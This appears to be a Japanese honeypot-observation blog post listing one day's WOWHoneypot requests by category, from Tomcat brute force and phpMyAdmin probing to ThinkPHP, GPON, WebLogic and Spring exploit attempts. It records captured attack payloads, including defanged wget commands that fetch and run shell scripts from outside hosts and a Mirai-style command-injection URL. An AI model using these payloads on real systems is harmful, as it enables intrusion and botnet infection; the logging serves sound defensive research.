23log

WOWHoneypotで観測した日々のログをつらつらと

WOWHoneypot観察(60日目)

2019/05/15(水)

トータルは501件です。

ハンティングログは以下です。

5.200.236.213 wget+hxxp[:]//hulo.r00ts.online/.config/Lrep

www.virustotal.com

123.206.77.106 wget hxxp[:]//194.147.32.131/sh

www.virustotal.com

件数 概要 リクエス
355 Tomcat管理ページに対するブルートフォース攻撃 GET /manager/html
34 アクセス GET /
2 Linksys ルータの E シリーズの脆弱性を狙った通信 POST /tmUnblock.cgi
2 POST /TP/public/index.php?s=captcha
2 phpMyAdminの調査 GET /xampp/phpmyadmin/index.php
2 phpMyAdminの調査 GET /www/phpMyAdmin/index.php
2 phpMyAdminの調査 GET /web/phpMyAdmin/index.php
2 phpMyAdminの調査 GET /typo3/phpmyadmin/index.php
2 phpMyAdminの調査 GET /tools/phpMyAdmin/index.php
2 phpMyAdminの調査 GET /pmd/index.php
2 phpMyAdminの調査 GET /pmamy2/index.php
2 phpMyAdminの調査 GET /pmamy/index.php
2 phpMyAdminの調査 GET /pma/index.php
2 phpMyAdminの調査 GET /pma-old/index.php
2 phpMyAdminの調査 GET /phpmyadmin2/index.php
2 phpMyAdminの調査 GET /phpmyadmin1/index.php
2 phpMyAdminの調査 GET /phpmyadmin0/index.php
2 phpMyAdminの調査 GET /phpmyadmin/phpmyadmin/index.php
2 phpMyAdminの調査 GET /phpmyadmin/index.php
2 phpMyAdminの調査 GET /phpmyadmin-old/index.php
2 phpMyAdminの調査 GET /phpma/index.php
2 phpMyAdminの調査 GET /phpadmin/index.php
2 phpMyAdminの調査 GET /phpMyadmin_bak/index.php
2 phpMyAdminの調査 GET /phpMyAdminold/index.php
2 phpMyAdminの調査 GET /phpMyAdmin/phpMyAdmin/index.php
2 phpMyAdminの調査 GET /phpMyAdmin/index.php
2 phpMyAdminの調査 GET /phpMyAdmin.old/index.php
2 phpMyAdminの調査 GET /mysqladmin/index.php
2 phpMyAdminの調査 GET /mysql/index.php
2 phpMyAdminの調査 GET /mysql-admin/index.php
2 phpMyAdminの調査 GET /myadmin2/index.php
2 phpMyAdminの調査 GET /myadmin/index.php
2 phpMyAdminの調査 GET /index.php
2 phpMyAdminの調査 GET /dbadmin/index.php
2 phpMyAdminの調査 GET /db/index.php
2 phpMyAdminの調査 GET /claroline/phpMyAdmin/index.php
2 phpMyAdminの調査 GET /admin/pma/index.php
2 phpMyAdminの調査 GET /admin/phpmyadmin2/index.php
2 phpMyAdminの調査 GET /admin/phpmyadmin/index.php
2 phpMyAdminの調査 GET /admin/phpMyAdmin/index.php
2 phpMyAdminの調査 GET /admin/mysql2/index.php
2 phpMyAdminの調査 GET /admin/mysql/index.php
2 phpMyAdminの調査 GET /admin/index.php
2 phpMyAdminの調査 GET /admin/PMA/index.php
2 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
2 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php
2 phpMyAdminの調査 GET /PMA2/index.php
2 phpMyAdminの調査 GET /PMA/index.php
1 IIS6.0の脆弱性を狙った通信 PROPFIND /
1 不正中継の調査 POST hxxp://check.best-proxies.ru/azenv.php?auth=155790432997637&a=PC&i=2160567056&p=8080
1 WebLogic脆弱性を狙った通信(CVE-2017-10271) POST /wls-wsat/CoordinatorPortType
1 Spring Data Commonsの脆弱性(CVE-2018-1273)を狙った通信 POST /users?page=&size=5
1 GPONルータの脆弱性(CVE-2018-10561)を突くMirai亜種の通信 POST /GponForm/diag_Form?images/
1 不正中継の調査 HEAD hxxp://123.125.114.144/
1 不正中継の調査 GET hxxp://www.ip.cn/
1 不正中継の調査 GET hxxp://www.123cha.com/
1 ZmEuによる調査 GET /w00tw00t.at.blackhats.romanian.anti-sec:)
1 ZmEuによるphpMyAdminの調査 GET /pma/scripts/setup.php
1 ZmEuによるphpMyAdminの調査 GET /phpmyadmin/scripts/setup.php
1 ZmEuによるphpMyAdminの調査 GET /phpMyAdmin/scripts/setup.php
1 ZmEuによるphpMyAdminの調査 GET /myadmin/scripts/setup.php
1 Mirai亜種による脆弱性を狙った通信 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://194.147.32.131/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$
1 メーラーの調査 GET /app/mailer/
1 apiの調査? GET /api
1 ZmEuによるphpMyAdminの調査 GET /MyAdmin/scripts/setup.php
1 不正中継の調査 CONNECT www.baidu.com:443
1 不正中継の調査 CONNECT cn.bing.com:443
1 不正中継の調査 CONNECT check.best-proxies.ru:80